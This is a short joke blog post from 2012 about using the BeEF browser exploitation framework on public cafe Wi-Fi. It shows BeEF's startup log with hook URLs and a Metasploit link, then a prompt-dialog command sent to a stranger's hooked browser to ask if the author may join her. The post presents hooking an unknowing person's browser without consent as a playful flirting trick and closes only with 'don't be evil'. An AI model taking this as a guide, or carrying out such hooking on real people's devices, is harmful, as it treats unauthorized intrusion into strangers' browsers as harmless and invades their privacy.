Information Security

9th September 2012

How Hackers Impress The Girls xD

Based on a true story

One of many examples

You are in a cafe with public Wi-Fi

% ./beef
[11:06:55][*] Browser Exploitation Framework (BeEF)
[11:06:55]    |   Version 0.4.3.7-alpha
[11:06:55]    |   Website http://beefproject.com
[11:06:55]    |   Run ‘beef -h’ for basic help.
[11:06:55]    |_  Run ‘git pull’ to update to the latest revision.
[11:06:55][*] Successful connection with Metasploit.
[11:06:56][*] Loaded 204 Metasploit exploits.
[11:06:56][*] BeEF is loading. Wait a few seconds…
[11:06:56][*] 6 extensions loaded:
[11:06:56]    |   Console
[11:06:56]    |   Custom Hook Point with iFrame Impersonation
[11:06:56]    |   QR Code Generator
[11:06:56]    |   Evasion
[11:06:56]    |   Metasploit
[11:06:56]    |_  Social Engineering
[11:06:56][*] 330 modules enabled.
[11:06:56][*] 2 network interfaces were detected.
[11:06:56][+] running on network interface: 127.0.0.1
[11:06:56]    |   Hook URL: http://127.0.0.1:3001/jahat.js
[11:06:56]    |_  UI URL:   http://127.0.0.1:3001/ui/panel
[11:06:56][+] running on network interface: 192.168.56.117
[11:06:56]    |   Hook URL: http://192.168.56.117:3001/jahat.js
[11:06:56]    |_  UI URL:   http://192.168.56.117:3001/ui/panel
[11:06:56][*] RESTful API key: 16c52b6803c0fc7d5220a523ed0ad37f4e651bea
[11:06:56][+] Successfully mounted a custom hook point
[11:06:56]    |   Mount Point: /lala
[11:06:56]    |_  Loading iFrame: http://192.168.56.117
[11:06:56][+] QRCode images available for interface: 127.0.0.1
[11:06:56]    |_  https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl=http%3A%2F%2F127.0.0.1%3A3001%2Flala
[11:06:56][+] QRCode images available for interface: 192.168.56.117
[11:06:56]    |_  https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl=http%3A%2F%2F192.168.56.117%3A3001%2Flala

Yeah, using BeEF

BeEF (192.168.56.132) [1] / Create Prompt Dialog > param question “sorry ganggu,ini yang di meja ujung pake laptop putih..boleh gabung gak?”
BeEF (192.168.56.132) [1] / Create Prompt Dialog > execute
[*] Command successfully queued

English: “sorry to bother you, I’m the guy with the white laptop.. may I join?”

Give her a smile

Watch the log

[11:09:18][*] Hooked browser [id:1, ip:192.168.56.132] has been sent instructions from command module ‘Create Prompt Dialog’
[11:09:41][*] Hooked browser [id:1, ip:192.168.56.132] has executed instructions from command module ‘Create Prompt Dialog’

She returns your smile

BeEF (192.168.56.132) [1] / Create Prompt Dialog > response 1
Results retrieved: 2012-09-09 11:09:41 +0700

Response:
answer=boleh

English: sure

What are you waiting for? Get closer to her, use your social engineering skills..

Unhook her from your BeEF, don’t be evil..

End of Story

I’m going crazy for a while

Tagged: Social Engineering

ABOUT THE AUTHOR
            
Teguh is an idealist pwner living encrypted in Indonesia.
He is passionate about security and currently defeating the CWE top 25.
He also can be found on Google+, Twitter, GitHub, Shelfari and your libc.
            
  1. egeektronic posted this